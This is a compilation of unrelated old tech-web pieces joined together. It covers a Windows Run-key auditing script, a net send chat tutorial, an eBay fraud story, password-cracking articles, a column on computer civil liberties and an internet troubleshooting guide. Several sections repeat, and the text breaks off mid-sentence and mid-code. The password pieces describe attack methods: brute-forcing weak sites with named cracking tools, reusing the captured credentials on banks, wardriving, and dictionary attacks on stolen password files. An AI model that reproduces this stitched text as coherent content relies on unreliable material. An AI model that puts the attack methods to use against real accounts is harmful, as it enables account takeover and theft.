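    """Pull the program path out of a Run value, dropping any arguments."""
    m = EXE.match(data.strip())
    if m:
        return m.group(1) or m.group(2)
    parts = data.split()
    return parts[0] if parts else ""


def longest_consonant_run(stem):
    """Length of the longest run of consonants (y is counted as a vowel)."""
    best = run = 0
    for ch in stem.lower():
        if ch.isalpha() and ch not in "aeiouy":
            run += 1
            best = max(best, run)
        else:
            run = 0
    return best


def review_entry(entry):
    """Return the reasons (possibly none) why an entry deserves a closer look."""
    path = exe_path(entry["data"])
    stem = ntpath.splitext(ntpath.basename(path))[0]
    reasons = []
    if "\\temp\\" in path.lower():
        reasons.append("runs from a Temp directory")
    if longest_consonant_run(stem) >= GIBBERISH_RUN:
        reasons.append("gibberish file name")
    return reasons


def audit_run_keys(text):
    """List the Run entries that match at least one heuristic."""
    findings = []
    for entry in parse_reg_query(text):
        reasons = review_entry(entry)
        if reasons:
            findings.append({"key": entry["key"], "name": entry["name"],
                             "path": exe_path(entry["data"]), "reasons": reasons})
    return findings


# Constructed sample of a reg query export for the two Run keys from step 6.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
    updater    REG_SZ    "C:\Documents and Settings\user\Local Settings\Temp\svch0st.exe" -silent

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SunJavaUpdateSched    REG_SZ    "C:\Program Files\Java\jre1.6.0\bin\jusched.exe"
    alkjdlkjfa    REG_SZ    C:\WINDOWS\system32\alkjdlkjfa.exe
"""

if __name__ == "__main__":
    for f in audit_run_keys(SAMPLE_REG_QUERY):
        print(f'{f["name"]}: {f["path"]} ({", ".join(f["reasons"])})')
```

Both checks are heuristics: a flagged entry is a prompt to look at the file, and a clean result does not prove the Run keys are safe.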
chat with ur friends
Have a Chat With Your Friends Without any software
Hey buddies or their buds, this is a trick through which you can chat with your friends/enemies/or even to me.........without any software installed into your computer!
here it goes...........
1. All you need is your friend's IP address and your Command Prompt.
2. Open your notepad and write this code as it is.................. I would prefer you to copy this !
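@echo off
rem Simple loop around "net send"; the receiving PC must have the Messenger service running
:A
Cls
echo MESSENGER
rem Ask for the target computer name or IP address, then the text to send
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A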
3. Now save this as "Messenger.Bat".
4. Drag this file (.bat file) over to Command Prompt and press enter!
5. You would then see something like this:
MESSENGER
User:
6. After "User" type the IP address of the computer you want to contact.
7. Before you press "Enter" it should look like this:
MESSENGER
User: IP_Address
Message: Hi, How are you ?
8. Now all you need to do is press "Enter", and start chatting
Wednesday, January 9, 2008
Selling Your Laptop on eBay
My mother, a longtime flea-market shopper, says it's always easier to buy than to sell. Man oh man, is she right about that.
Twice in just over a week, my efforts to sell a laptop on eBay were thwarted. One effort climaxed in an excruciatingly anxious dash to the post office--to retrieve the laptop I had just shipped.
Here's the story, in a nutshell, followed by a few lessons learned.
Acting Without Authorization
In early 2007, I bought my sweet little Sony Vaio TXN19P/L ultraportable to use as a secondary computer. (Read my review of a similar Vaio laptop.) It's been an ideal traveling companion: The laptop weighs just 2.8 pounds and goes for 5 hours or more on a charge. It has a gorgeous screen and beautiful Slate Blue carbon fiber casing--it truly is a masterpiece of industrial design.
The laptop was pricey, however. In January 2007 I paid $2800 for this model, which has 2GB of RAM, an 80GB hard drive, and Windows XP Professional. And so, in December, I decided to sell it. I felt it was time to try something new and oh, all right: I needed the money. Plus, I have an older, less glamorous, but still working IBM ThinkPad 240 in my closet. Why not use that?
At any rate, I listed the Sony laptop on eBay on December 8, thinking it would catch the interest of holiday shoppers. I put a reserve price on the laptop as well as offered the "Buy It Now" option.
One week later, as the auction ended, the reserve price was met and the laptop sold. I boxed up the laptop, considering it a done deal. But two hours later, I received a message from eBay, informing me the listing had been "cancelled due to bidding activity that took place without the account owner's authorization."
And then eBay wiped out the listing. It was as if it had never existed. Worse, eBay informed me of the following: "Unfortunately, it is not possible for us to automatically relist these items for you. Instead, to relist these items you will need to start from the beginning of the listing process...We know that this is an inconvenience and we apologize for the negative impact it may cause you. We are working on tools to allow you to relist your items without starting from the beginning, but they are not available at this time."
In other words, to relist my laptop on eBay, I had to start all over again.
When I asked eBay about this, a spokesperson responded in e-mail: "The current process where we cancel the listing is optimized around immediately refunding the seller's full fees (listing fee and final value fee). We realize that this solution can also have its drawbacks--specifically the inconvenience to the seller of having their listing removed and also the inability to offer Second Chance Offers to any underbidders, which is why eBay is always looking for ways to improve its services to its users."
Bolting Like Batman
On December 17, a few days after the laptop's second listing appeared, someone from Indonesia contacted me via e-mail and asked if I would ship to Bali. I was hesitant, as I worried about Customs forms and other details I wouldn't have to deal with if selling to a U.S. buyer. I checked the potential buyer's eBay feedback--it was nearly 100 percent positive. So, even though I had reservations, I agreed to sell to him.
Minutes later, the man from Bali used the "Buy It Now" option to procure my laptop and pay me via PayPal. He urged me to ship it to him right away, to be sure he could get it in time for the holidays. At 1:19 p.m. (Pacific Standard Time), I received an e-mail from PayPal, informing me the funds were in my account. So I labeled the box containing the laptop and headed to the post office.
I groaned when I saw the long line at the post office, but I expected as much at this time of year. I filled out the necessary forms and waited in line for about 30 minutes. All told, everything went smoothly. Still, I wondered: Am I doing the right thing?
After returning home, I went back to work. Around 4:45 p.m., I checked my e-mail and discovered one from PayPal (sent at 4:16 p.m.). This one informed me that I "may have received an unauthorized payment...We have placed a temporary hold on the funds until the investigation is complete."
Dear reader, you should have seen me tearing out of my office, jumping into my car, and rocketing to the post office, like Batman out to save Gotham. Would my package still be there?, I fretted. Would they give it back to me?
When I arrived at the post office, it was about 5 p.m. The line was even longer now--nearly snaking out the door. I took my place at the end and fidgeted. What if a truck with my laptop on it is driving away at this very moment, while I'm standing in line?
I asked the person behind me to save my place in line. Then I dashed to the counter and told the clerk I had an emergency. Had their trucks picked up any packages in the last half hour or so? The clerk, who had no doubt seen a lot of foolishness that busy day, eyed me warily and said no, he didn't think so, but go to the back of the line.
For the next 45 minutes, while I waited in line, I took deep breaths and tried to remain calm. Finally, it was my turn, and after some explaining, I was mercifully reunited with my package and refunded the $61 shipping charges.
By the time I returned home, PayPal had determined the buyer had purchased my laptop fraudulently and had removed the deposit from my account.
Learning Lessons
I must admit this ordeal left me feeling a bit foolish. But I decided to write about my experience to underscore the potential peril of selling an expensive laptop over the Internet to a stranger.
On balance, I've sold dozens of things on eBay before and never experienced fraud. Once, someone didn't follow through on his winning bid, but that's the worst of it. And as an eBay buyer, I've never received anything that wasn't what I had expected.
Nonetheless, I've learned some valuable lessons. First: Trust my instincts. I didn't have a good feeling about the second buyer, and I was right. Second: In the future, I will wait 24 hours after receiving payment before I ship an item, especially for big-ticket items like a laptop. Granted, PayPal alerted me within 3 hours of the fraud. But had I not been able to react quickly, my laptop would have gone to Bali, and trying to get it back would have been a nightmare, if not an impossibility.
A few tips from PayPal regarding selling online:
Beware of unusual requests. Abnormal requests can be a sign of suspicious activity. A few examples include:
Rush shipments at any cost.
Partial payments from multiple PayPal accounts.
Payments not received in full.
Be extra cautious with high-priced items. It's fairly common for shipping addresses to differ from billing addresses. However, be extra cautious when sending high-priced items, especially if payment is received from one country and sent to another.
More tips are available from PayPal.
Next Steps
As for my Sony laptop? Call me a glutton for punishment, but I am going to give eBay one last try. And if this doesn't work, I may try selling it on Craigslist. Or I may just keep the laptop. It really is such a sweet little thing.
Mobile Computing News, Reviews, & Tips
First HD DVD-RW Laptop: Toshiba's newest Qosmio multimedia laptop is said to be the first with a rewritable HD DVD drive, plus two HDTV tuners. The $3500 laptop recently went on sale in Japan. Toshiba didn't announce overseas launch plans.
New Rules for Laptop Batteries: Beginning January 1, air travelers in the U.S. are prohibited from carrying spare lithium batteries in their checked baggage. The U.S. Department of Transportation's new regulations are designed to minimize the risk of fire, which lithium batteries have been suspected of causing in rare cases. It's okay to have a lithium battery installed in a device, such as a digital camera, in your checked baggage--you just can't have a battery floating around loose in your luggage. Also, you can still carry extra batteries in your carry-on bags, provided they are stored in their original packaging or in a plastic bag. For more details, read "US Bans Spare Lithium Batteries From Checked Bags."
Convert Your Media for the Road: Before you hit the road, you might want to transfer your favorite YouTube videos or TiVo recordings to your portable media player. While this isn't always a straightforward process--iTunes won't let you import DVDs, for example--there are software programs that can make it happen. For details read our step-by-step guide, "Master Your Media."
Learning Lessons
I must admit this ordeal left me feeling a bit foolish. But I decided to write about my experience to underscore the potential peril of selling an expensive laptop over the Internet to a stranger.
On balance, I've sold dozens of things on eBay before and never experienced fraud. Once, someone didn't follow through on his winning bid, but that's the worst of it. And as an eBay buyer, I've never received anything that wasn't what I had expected.
Nonetheless, I've learned some valuable lessons. First: Trust my instincts. I didn't have a good feeling about the second buyer, and I was right. Second: In the future, I will wait 24 hours after receiving payment before I ship an item, especially for big-ticket items like a laptop. Granted, PayPal alerted me within 3 hours of the fraud. But had I not been able to react quickly, my laptop would have gone to Bali, and trying to get it back would have been a nightmare, if not an impossibility.
A few tips from PayPal regarding selling online:
Beware of unusual requests. Abnormal requests can be a sign of suspicious activity. A few examples include:
Rush shipments at any cost.
Partial payments from multiple PayPal accounts.
Payments not received in full.
Be extra cautious with high-priced items. It's fairly common for shipping addresses to differ from billing addresses. However, be extra cautious when sending high-priced items, especially if payment is received from one country and sent to another.
More tips are available from PayPal.
Next Steps
As for my Sony laptop? Call me a glutton for punishment, but I am going to give eBay one last try. And if this doesn't work, I may try selling it on Craigslist. Or I may just keep the laptop. It really is such a sweet little thing.
For More Information
Video: "EBay Goes Web 2.0"
"What EBay Tells Us about Pop Culture in 2007"
"Tips & Tweaks: All About eBay"
Mobile Computing News, Reviews, & Tips
First HD DVD-RW Laptop: Toshiba's newest Qosmio multimedia laptop is said to be the first with a rewritable HD DVD drive, plus two HDTV tuners. The $3500 laptop recently went on sale in Japan. Toshiba didn't announce overseas launch plans.
New Rules for Laptop Batteries: Beginning January 1, air travelers in the U.S. are prohibited from carrying spare lithium batteries in their checked baggage. The U.S. Department of Transportation's new regulations are designed to minimize the risk of fire, which lithium batteries have been suspected of causing in rare cases. It's okay to have a lithium battery installed in a device, such as a digital camera, in your checked baggage--you just can't have a battery floating around loose in your luggage. Also, you can still carry extra batteries in your carry-on bags, provided they are stored in their original packaging or in a plastic bag. For more details, read "US Bans Spare Lithium Batteries From Checked Bags."
Convert Your Media for the Road: Before you hit the road, you might want to transfer your favorite YouTube videos or TiVo recordings to your portable media player. While this isn't always a straightforward process--iTunes won't let you import DVDs, for example--there are software programs that can make it happen. For details read our step-by-step guide, "Master Your Media."
Suggestion Box
Is there a particularly cool mobile computing product or service I've missed? Got a spare story idea in your back pocket? Tell me about it. However, I regret that I'm unable to respond to tech-support questions, due to the volume of e-mail I receive.
How I’d Hack Your Weak Passwords
If you invited me to try and crack your password, you know the one that you use over and over for like every web page you visit, how many guesses would it take before I got it?
Let’s see… here is my top 10 list. I can obtain most of this information much easier than you think, then I might just be able to get into your e-mail, computer, or online banking. After all, if I get into one I’ll probably get into all of them.
1. Your partner, child, or pet’s name, possibly followed by a 0 or 1 (because they’re always making you use a number, aren’t they?)
2. The last 4 digits of your social security number.
3. 123 or 1234 or 123456.
4. “password”
5. Your city, or college, football team name.
6. Date of birth - yours, your partner’s or your child’s.
7. “god”
8. “letmein”
9. “money”
10. “love”
Statistically speaking that should probably cover about 20% of you. But don’t worry. If I didn’t get it yet it will probably only take a few more minutes before I do…

Hackers, and I’m not talking about the ethical kind, have developed a whole range of tools to get at your personal data. And the main impediment standing between your information remaining safe, or leaking out, is the password you choose. (Ironically, the best protection people have is usually the one they take least seriously.)
One of the simplest ways to gain access to your information is through the use of a Brute Force Attack. This is accomplished when a hacker uses a specially written piece of software to attempt to log into a site using your credentials. Insecure.org has a list of the Top 10 FREE Password Crackers right here.
So, how would one use this process to actually breach your personal security? Simple. Follow my logic:
You probably use the same password for lots of stuff right?
Some sites you access such as your Bank or work VPN probably have pretty decent security, so I’m not going to attack them.
However, other sites like the Hallmark e-mail greeting cards site, an online forum you frequent, or an e-commerce site you’ve shopped at might not be as well prepared. So those are the ones I’d work on.
So, all we have to do now is unleash Brutus, wwwhack, or THC Hydra on their server with instructions to try say 10,000 (or 100,000 - whatever makes you happy) different usernames and passwords as fast as possible.
Once we’ve got several login+password pairings we can then go back and test them on targeted sites.
But wait… How do I know which bank you use and what your login ID is for the sites you frequent? All those cookies are simply stored, unencrypted and nicely named, in your Web browser’s cache. (Read this post to remedy that problem.)
And how fast could this be done? Well, that depends on three main things, the length and complexity of your password, the speed of the hacker’s computer, and the speed of the hacker’s Internet connection.
Assuming the hacker has a reasonably fast connection and PC here is an estimate of the amount of time it would take to generate every possible combination of passwords for a given number of characters. After generating the list it’s just a matter of time before the computer runs through all the possibilities - or gets shut down trying.
Pay particular attention to the difference between using only lowercase characters and using all possible characters (uppercase, lowercase, and special characters - like @#$%^&*). Adding just one capital letter and one asterisk would change the processing time for an 8 character password from 2.4 days to 2.1 centuries.
Password Length | All Characters | Only Lowercase
3 characters | 0.86 seconds | 0.02 seconds
4 characters | 1.36 minutes | .046 seconds
5 characters | 2.15 hours | 11.9 seconds
6 characters | 8.51 days | 5.15 minutes
7 characters | 2.21 years | 2.23 hours
8 characters | 2.10 centuries | 2.42 days
9 characters | 20 millennia | 2.07 months
10 characters | 1,899 millennia | 4.48 years
11 characters | 180,365 millennia | 1.16 centuries
12 characters | 17,184,705 millennia | 3.03 millennia
13 characters | 1,627,797,068 millennia | 78.7 millennia
14 characters | 154,640,721,434 millennia | 2,046 millennia
Remember, these are just for an average computer, and these assume you aren’t using any word in the dictionary. If Google put their computer to work on it they’d finish about 1,000 times faster.
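The arithmetic behind the table above, as an added example (not code from the original article): the figures fit a keyspace of alphabet^length searched at one million guesses per second, with 95 printable ASCII characters for "All Characters" and 26 for "Only Lowercase". Both constants are inferred from the table's numbers rather than stated by the author, and the function names are hypothetical.

```python
"""Keyspace arithmetic behind the password-length table (added example)."""
import string

# Assumptions inferred from the table's figures, not stated in the article.
GUESSES_PER_SECOND = 1_000_000
ALL_CHARACTERS = 95   # 26 lower + 26 upper + 10 digits + 33 symbols (incl. space)
ONLY_LOWERCASE = 26

YEAR = 365 * 86400  # seconds in a 365-day year
UNITS = [
    ("millennia", 1000 * YEAR),
    ("centuries", 100 * YEAR),
    ("years", YEAR),
    ("months", YEAR / 12),
    ("days", 86400),
    ("hours", 3600),
    ("minutes", 60),
    ("seconds", 1),
]

# Fixed strings from the article's top-10 list of first guesses.
FIRST_GUESSES = {"123", "1234", "123456", "password",
                 "god", "letmein", "money", "love"}


def exhaust_seconds(length, alphabet, rate=GUESSES_PER_SECOND):
    """Seconds needed to try every string of exactly `length` symbols."""
    return alphabet ** length / rate


def humanize(seconds):
    """Render a duration in the largest unit that is at least 1."""
    for name, size in UNITS:
        if seconds >= size:
            return f"{seconds / size:,.2f} {name}"
    return f"{seconds:.2f} seconds"


def alphabet_size(password):
    """Size of the character pool implied by the classes the password uses."""
    size = 0
    if any(c in string.ascii_lowercase for c in password):
        size += 26
    if any(c in string.ascii_uppercase for c in password):
        size += 26
    if any(c in string.digits for c in password):
        size += 10
    if any(c not in string.ascii_letters + string.digits for c in password):
        size += 33  # everything else is counted as a symbol
    return size


def assess(password):
    """Worst-case exhaustion time for one password under the table's model.

    A password on the first-guess list is reported as zero time, because it
    is tried before any exhaustive search starts.
    """
    common = password.lower() in FIRST_GUESSES
    pool = alphabet_size(password)
    if common or not password:
        seconds = 0.0
    else:
        seconds = exhaust_seconds(len(password), pool)
    return {"common": common, "alphabet": pool,
            "length": len(password), "worst_case": humanize(seconds)}


def table(lengths=range(3, 15)):
    """Rows of (length, all-characters time, lowercase-only time)."""
    return [(n,
             humanize(exhaust_seconds(n, ALL_CHARACTERS)),
             humanize(exhaust_seconds(n, ONLY_LOWERCASE)))
            for n in lengths]


if __name__ == "__main__":
    for n, all_chars, lower in table():
        print(f"{n:>2} characters  {all_chars:>32}  {lower:>18}")
    # Sample passwords taken from the article's own lists and tips.
    for sample in ("letmein", "modeltford", "Mod3lTF0rd"):
        print(sample, assess(sample))
```

The same model gives 0.46 seconds for four lowercase characters, where the table prints .046. The result is a ceiling for randomly chosen passwords only; it says nothing about a password built on a dictionary word, which the table's figures explicitly exclude.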
Now, I could go on for hours and hours more about all sorts of ways to compromise your security and generally make your life miserable - but 95% of those methods begin with compromising your weak password. So, why not just protect yourself from the start and sleep better at night?
Believe me, I understand the need to choose passwords that are memorable. But if you’re going to do that how about using something that no one is ever going to guess AND doesn’t contain any common word or phrase in it.
Here are some password tips:
Randomly substitute numbers for letters that look similar. The letter ‘o’ becomes the number ‘0’, or even better an ‘@’ or ‘*’. (i.e. - m0d3ltf0rd… like modelTford)
Randomly throw in capital letters (i.e. - Mod3lTF0rd)
Think of something you were attached to when you were younger, but DON’T CHOOSE A PERSON’S NAME! Every name plus every word in the dictionary will fail under a simple brute force attack.
Maybe a place you loved, or a specific car, an attraction from a vacation, or a favorite restaurant?
You really need to have different username / password combinations for everything. Remember, the technique is to break into anything you access just to figure out your standard password, then compromise everything else. This doesn’t work if you don’t use the same password everywhere.
Since it can be difficult to remember a ton of passwords, I recommend using Roboform. It will store all of your passwords in an encrypted format and allow you to use just one master password to access all of them. It will also automatically fill in forms on Web pages, and you can even get versions that allow you to take your password list with you on your PDA, phone or a USB key. If you’d like to download it without having to navigate their web site here is the direct download link.
Once you’ve thought of a password, try Microsoft’s password strength tester to find out how secure it is.
EDIT: By request I’ve created a short RoboForm Demonstration video. It ain’t great, but I guess it’s better than nothing. Hope it helps…
Another thing to keep in mind is that some of the passwords you think matter least actually matter most. For example, some people think that the password to their e-mail box isn’t important because “I don’t get anything sensitive there.” Well, that e-mail box is probably connected to your online banking account. If I can compromise it then I can log into the Bank’s Web site and tell it I’ve forgotten my password to have it e-mailed to me. Now, what were you saying about it not being important?
Often times people also reason that all of their passwords and logins are stored on their computer at home, which is safe behind a router or firewall device. Of course, they’ve never bothered to change the default password on that device, so someone could drive up and park near the house, use a laptop to breach the wireless network and then try passwords from this list until they gain control of your network - after which time they will own you!
Now I realize that every day we encounter people who over-exaggerate points in order to move us to action, but trust me this is not one of those times. There are 50 other ways you can be compromised and punished for using weak passwords that I haven’t even mentioned.
I also realize that most people just don’t care about all this until it’s too late and they’ve learned a very hard lesson. But why don’t you do me, and yourself, a favor and take a little action to strengthen your passwords and let me know that all the time I spent on this article wasn’t completely in vain.
Please, be safe. It’s a jungle out there.
HOW `CRACKERS' CRACK
Mercury News Computing Editor

Police, prosecutors and most of the press call them "hackers." Computer cognoscenti prefer the term "crackers." Both sides are talking about the same people, typically young men, whose fascination with computers leads them to gain access to computers where they don't belong.

A few crackers make headlines, like Robert T. Morris Jr., son of a top computer security expert for the supersecret National Security Agency, who let loose a "worm" program on a national network of university, research and government computers in 1988. There are also notorious crackers like Kevin Mitnick, who was under investigation at the age of 13 for illegally obtaining free long-distance phone calls and was sentenced to prison in 1989 for computer break-ins. Then there are legions of far more ordinary crackers who simply use their knowledge of computers to "explore" intriguing corporate or government computers or simply to go for the electronic equivalent of a joy ride and impress their friends.

But they all share something: an air of mystery. How do they do it?

At a recent conference on computer freedom and privacy, computer expert Russell L. Brand gave a four-hour lecture on the inner workings of computer cracking. His basic message: Cracking is not as hard as it seems to an outsider, and it often goes undetected by legitimate users of "cracked" computers.

"Just because you don't see a problem is no reason to think a problem hasn't occurred," Brand said. "Generally it's a month to six weeks before (operators) notice anything happened and usually because the cracker accidentally broke something."

Home computers aren't in danger from crackers because they aren't accessible to outsiders--and because they aren't interesting to crackers. Instead, they target mainframes and minicomputers that support many users and are connected to telephone lines and large networks.

Understanding how crackers work and what security weaknesses they exploit can help system managers prevent many break-ins, Brand said. And the biggest problem is carelessness.

"When I started looking at break-ins, I had the assumption that technical problems were at fault," he said. "But the problem is human beings."

The "Cracker": Most crackers are not bent on stealing either money or secrets but will target a particular computer for entry because of the bragging rights they will enjoy with fellow crackers once they prove they broke in. Typically, the computer belongs to a corporation or the government and is considered in cracking circles to be hard to penetrate. Often, it is connected to the nationwide NSFNet computer network.

The attack: Crackers can attack the target computer from home, using a modem and a telephone line. Or they can visit a publicly accessible terminal room, like one on a college campus, using the school's computer to attack the target through a network. At home, the cracker works undisturbed and unseen for hours, but phone calls might be traced.

The resources: If the target computer is nearby, the cracker may look through the owner's trash for valuable information, a practice called "dumpster diving." Discarded printouts, manuals or other paper may contain lists of accounts, some passwords, or technical data more sophisticated crackers can exploit.

The target: The easiest way to enter the target is with an account name and its password. Passwords are often the weakest link in a computer's security system: Many are easy to guess, and some accounts have no password at all. Sophisticated crackers use their personal computers to quickly try thousands of potential passwords for a match.

The cover: To make calls from home harder to trace, crackers might use stolen telephone credit-card numbers to place a series of calls through different long-distance carriers or corporate switchboards before calling the target computer's modem.

The way in: Many crackers take advantage of "holes" in the operating system, the software that controls the basic operations of the machine. The holes are like secret doors that either let crackers make their own "super" accounts or just bypass accounts and passwords altogether. Five holes in the Unix operating system account for the bulk of computer break-ins--yet many installations have failed to patch them.

The network: Most large computers are connected to several others through networks, a chief point of attack. Computers erect barriers to people but often completely trust other computers, so attacking a computer through another computer on the network can be easier than attacking it with a personal computer and a modem.

Ill-used passwords let many pass

Passwords are the security linchpin for most computer systems. But these supposedly secret keys to computer access are easily obtained by a determined cracker. The main reason: Users and system managers often are so careless with passwords that they are as easy to find as a door key left under the welcome mat.

Part of the problem is the proliferation of computers and computerlike devices such as automated teller machines, all of which require passwords or personal identification numbers. Many people must now remember half a dozen or more such secret codes, encouraging them to make each one short and simple. Often, that means making their passwords the same as their account name, which in turn is often the user's own first or last name. Such identical combinations are called "Joe" accounts, and according to computer expert Russell L. Brand, they are "the single most common cause of password problems in the world."

Knowing there are Joes, a cracker can simply try a few dozen common English names with a reasonable chance that one will work. Armed with an easily obtained company directory of employees, the task can be even easier.

Joe accounts also crop up when the system manager creates an account for a new employee, expecting that the user will immediately change the given password from his or her name to something else. But users often fail to make the change or aren't told how. Sometimes, they never use the account at all, providing not only easy access for the cracker but an account where the owner won't notice any illicit activity.

Even if crackers can't find a "Joe" on the computer they want to enter, there are several other common ways for them to find a password that will work:

- Many systems have accounts with no passwords or have accounts for occasional visitors to use where the ID and password are both GUEST.
- Outdated operator's manuals retrieved from the trash often list the account name and standard password provided by the operating system for use by maintenance programmers. Although it can and should be changed, the password seldom is.
- "Social engineering"--in effect, persuading someone, usually by telephone, to divulge account names, passwords or both--is a common ploy used by crackers.
- Crackers are sometimes able to obtain an encrypted list of passwords for a target computer, discarded by the owners who mistakenly believe the coded words aren't useful to crackers. While it's true they are difficult to decode, it is easy for a cracker to use a personal computer to take a potential password and encode it. Because most passwords are ordinary English words, crackers can simply run a personal computer program to encode the contents of an electronic dictionary and identify any entries that match passwords on the coded list.
- In another form of deception, crackers set up public bulletin board systems whose real purpose is to snag passwords. Because many people tend to use the same password for all their computer accounts, the cracker can simply wait until someone who has an account on the target computer also sets up an account on the bulletin board. The cracker then reads the password and tries it on the target system.

While individual users can't delete dormant accounts from their computers or keep an eye on the trash, they can be intelligent about what passwords they use. Brand suggests users choose a short phrase that's easy for them to remember and then use the first two letters of each word as the password. As added protection, users who are able should mix uppercase and lowercase letters in their passwords or use a punctuation mark in the middle of the word.

--Rory J. O'Connor

The rights of bits

Constitutional scholar Laurence H. Tribe, widely considered the first choice for any Supreme Court vacancy that might arise under a Democratic administration, proposed a fairly radical idea recently: a constitutional amendment covering computers. Tribe's proposal for a 27th Amendment would specifically extend First and Fourth Amendment protections to the rapidly growing and increasingly pervasive universe of computing. Those rights would be "construed as fully applicable without regard to the technological method or medium through which information content is generated, stored, altered, transmitted or controlled," in the words of the proposed amendment.

I am not a constitutional scholar, but I have to believe that what's needed is not a change in the Constitution, but instead a change in the thinking of judges in particular and the public in general. Tribe acknowledges that he doesn't take amendments lightly, pointing to the ridiculous brouhaha over a flag-burning amendment as an example of what not to do to the basic law of the land. But like many people who are more deeply involved in the world of computers, Tribe sees the issue of civil liberties in an information society as a crucial one.

The question is not whether the civil liberties issue is serious enough to be addressed by some fundamental legal change. The question is really how to get people to see that communicating with a computer is speech, and that to search a computer and seize data is the same as searching a house and seizing the contents of my filing cabinet. People seem to have trouble making these connections when computers are involved, even though they wouldn't have trouble recognizing a private telephone conversation as protected speech. Yet most telephone calls in this country are, at some time in their transmission, nothing more than a stream of computer bits traveling between sophisticated computers.

Admittedly, computers do make for some complications where things like search and seizure are concerned. Let's say the FBI gets a search warrant for a computer bulletin board, looking for a specific set of messages about an illegal drug business. Because a single hard disk drive on a bulletin board system can contain thousands of messages from different users, the normal method for police will be to take the whole disk, and probably the computer as well, back to the lab to look for the suspect messages. Of course, that exposes other, supposedly confidential messages to police scrutiny. It also interrupts the legitimate operation of what is, in effect, an electronic printing press. Certainly, in the case of a real printing press that used paper, such police activity would never be allowed. But a computer is involved here, which to some appears to make the existing rules inapplicable. But in a case like this, we don't need a new amendment, just the proper application of the Bill of Rights.

As a more practical matter, the chances of amending the Constitution are slight. It was the intent of the framers to make the task difficult, to prevent just such trivial things as flag-burning amendments from being tacked onto the document. Even the far more substantial Equal Rights Amendment did not survive the rocky road from proposal to adoption. I doubt Tribe's
Connectivity Issues
If you're having problems connecting to the internet, here are some troubleshooting tips to help solve your internet connectivity issues. Please note that this article is written for Windows XP, but can be applied to other operating systems. Be sure to pay attention to your computer and the steps it goes through when accessing the internet. Watch the small icon on your quick launch bar in the far right corner of your screen to see where it may be running into a problem. If you hold your mouse over the icon, it should relay what part of the process it is currently working on or the state of your connectivity. Also be aware of the icons and what they mean. If you are not connected, there will be a small red x over the icon, and if there are some issues with your connectivity, there may be a yellow triangle with an exclamation mark on it.
Establish a Connection:
First establish that your internet is working and that all your cords are snapped securely into place. Most problems occur between the router and the computer, so check to see if your internet connection is simply out first. Also be sure to check the settings of your firewall. If you just installed one and haven’t allowed the correct programs access, that may be the problem. If you suspect it's your firewall, disable it to test your connection; if it's not the cause, be sure to turn it back on.
Modem to computer:
* Unplug both router and modem
* Connect your computer directly into the modem
* Restart your computer
* If your internet connection works then it is an issue between your router, computer and modem.
Power Cycling:
Many times power cycling will solve your problem. You can also try resetting your modem and your router. If you have wireless security set up, make sure you enable it again if you restart your router.
* Power down both router and modem
* Plug modem back in and wait until all lights are flashing correctly. Make sure not to skip this step; the modem needs to be able to recognize all ports connected to it.
* Power router back on
* Restart your computer
Checking and repairing your status via Network Connections:
If you're on Windows XP, go to Start > Control Panel > Network Connections. From here you can view the current status of your internet connections. There may be many icons, depending on whether you have a wireless card or adapter hooked up to your computer. If you're using a wired connection, pay attention to the Local Area Connection icon. If you're using a wireless connection, focus on the Wireless Network Connection icon.
* Ensure your connections are not disabled; you can right click the icon to enable disabled connections.
* Right click and drop down to repair to see if it can fix your issue. Many times it will tell you a more specific error such as an IP conflict, or it will say: “Windows finished repairing your connection. You can try connecting again. If the problem persists, contact the person who manages your network.” This is an all clear sign that Windows cannot detect a problem and your connection should be fine. Of course this isn’t always the case.
Ipconfig:
Another good way to see if you're connected at all is ipconfig. To check ipconfig, go to Start > Run and type in cmd. This will open the command prompt; then type in ipconfig. Become familiar with this while troubleshooting, as it can help you isolate issues in the future. Ipconfig will show you your IP address, subnet mask and default gateway if your computer is receiving any. Your IP address is from your modem, and generally if it shows up you're getting a signal from your modem to your computer. If only your subnet mask shows up and the rest are 0.0.0.0, then there is no internet signal coming through your modem and you only have a connection to your router.
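The ipconfig reading described above can be automated. This is an added example, not part of the original article: it parses ipconfig text and labels each adapter. The sample output is constructed, and the "self-assigned address" state (a 169.254.x.x address that Windows gives itself when DHCP does not answer) is an addition the article does not mention.

```python
import ipaddress
import re

# Constructed sample in the layout Windows XP's ipconfig prints (not captured
# from a real machine). One adapter per state the checker reports.
SAMPLE_OUTPUT = """\
Windows IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.1.100
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.1

Ethernet adapter Wireless Network Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 0.0.0.0
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 0.0.0.0

Ethernet adapter Local Area Connection 2:

        Connection-specific DNS Suffix  . :
        Autoconfiguration IP Address. . . : 169.254.17.42
        Subnet Mask . . . . . . . . . . . : 255.255.0.0
        Default Gateway . . . . . . . . . :
"""

# "Ethernet adapter <connection name>:" starts a new adapter section.
ADAPTER_RE = re.compile(r"^\S.*adapter (.*):\s*$")
# Indented "Label . . . . : value" lines; the dot leaders are dropped.
FIELD_RE = re.compile(r"^\s+(.*?)[ .]*:\s*(.*)$")


def parse_ipconfig(text):
    """Return {connection name: {field label: value}}."""
    adapters, current = {}, None
    for line in text.splitlines():
        header = ADAPTER_RE.match(line)
        if header:
            current = adapters.setdefault(header.group(1), {})
            continue
        field = FIELD_RE.match(line)
        if field and current is not None:
            current[field.group(1)] = field.group(2).strip()
    return adapters


def classify(fields):
    """Apply the article's rule of thumb to one adapter's fields."""
    ip = next((value for label, value in fields.items()
               if label.endswith(("IP Address", "IPv4 Address"))), "")
    gateway = fields.get("Default Gateway", "")
    try:
        # Newer Windows versions append "(Preferred)" to the address.
        addr = ipaddress.ip_address(ip.split("(")[0])
    except ValueError:
        return "no address"            # field missing or empty
    if addr.is_unspecified:
        return "no address"            # 0.0.0.0: nothing was handed out
    if addr.is_link_local:
        return "self-assigned address" # 169.254.x.x: DHCP did not answer
    if gateway in ("", "0.0.0.0"):
        return "address but no gateway"
    return "address and gateway"


def diagnose(text):
    return {name: classify(fields)
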